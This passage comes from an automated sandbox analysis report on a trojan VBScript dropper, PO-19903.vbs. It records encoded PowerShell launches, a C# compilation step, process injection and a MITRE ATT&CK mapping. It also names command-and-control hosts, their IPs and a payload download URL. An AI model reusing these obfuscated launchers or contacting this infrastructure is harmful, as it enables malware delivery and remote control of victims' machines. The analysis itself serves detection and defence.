QBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdlineJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"Jump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08745AE4 CreateNamedPipeW,2_2_08745AE4

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		1
    Registry Run Keys / Startup Folder    		112
    Process Injection    		1
    Masquerading    		OS Credential Dumping111
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium11
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting    		1
    DLL Side-Loading    		1
    Registry Run Keys / Startup Folder    		131
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Non-Standard Port    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)1
    DLL Side-Loading    		112
    Process Injection    		Security Account Manager131
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Ingress Tool Transfer    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer2
    Non-Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingData Transfer Size Limits213
    Application Layer Protocol    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 625175 Sample: PO-19903.vbs Startdate: 12/05/2022 Architecture: WINDOWS Score: 100 43 vegproworld.com 2->43 45 toshiba1122.duckdns.org 2->45 47 5 other IPs or domains 2->47 51 Multi AV Scanner detection for domain / URL 2->51 53 Found malware configuration 2->53 55 Antivirus detection for URL or domain 2->55 57 5 other signatures 2->57 11 wscript.exe 2 2->11         started        signatures3 process4 signatures5 65 Wscript starts Powershell (via cmd or directly) 11->65 67 Very long command line found 11->67 69 Encrypted powershell cmdline option found 11->69 14 powershell.exe 25 11->14         started        process6 signatures7 71 Writes to foreign memory regions 14->71 73 Tries to detect Any.run 14->73 17 ieinstal.exe 8 8 14->17         started        21 csc.exe 3 14->21         started        24 conhost.exe 14->24         started        process8 dnsIp9 37 toshiba1122.ddns.net 197.210.226.45, 3360 VCG-ASNG Nigeria 17->37 39 toshiba1122.duckdns.org 194.5.98.59, 3360, 49741, 49743 DANILENKODE Netherlands 17->39 41 3 other IPs or domains 17->41 49 Tries to detect Any.run 17->49 26 wscript.exe 2 17->26         started        35 C:\Users\user\AppData\Local\...\ppgnlr3u.dll, PE32 21->35 dropped 29 cvtres.exe 1 21->29         started        file10 signatures11 process12 signatures13 59 Wscript starts Powershell (via cmd or directly) 26->59 61 Very long command line found 26->61 63 Encrypted powershell cmdline option found 26->63 31 powershell.exe 1 26->31         started        process14 process15 33 conhost.exe 31->33         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PO-19903.vbs20%ReversingLabsScript.Trojan.Valyria

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    l-0004.l-dc-msedge.net0%VirustotalBrowse
    toshiba1122.duckdns.org2%VirustotalBrowse
    vegproworld.com5%VirustotalBrowse
    toshiba1122.ddns.net2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
    https://go.micro0%Avira URL Cloudsafe
    https://vegproworld.com/:k0%Avira URL Cloudsafe
    https://contoso.com/0%Avira URL Cloudsafe
    https://vegproworld.com/rj-$0%Avira URL Cloudsafe
    https://contoso.com/License0%Avira URL Cloudsafe
    https://contoso.com/Icon0%Avira URL Cloudsafe
    https://vegproworld.com/wp-content/Touchb.vbs0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
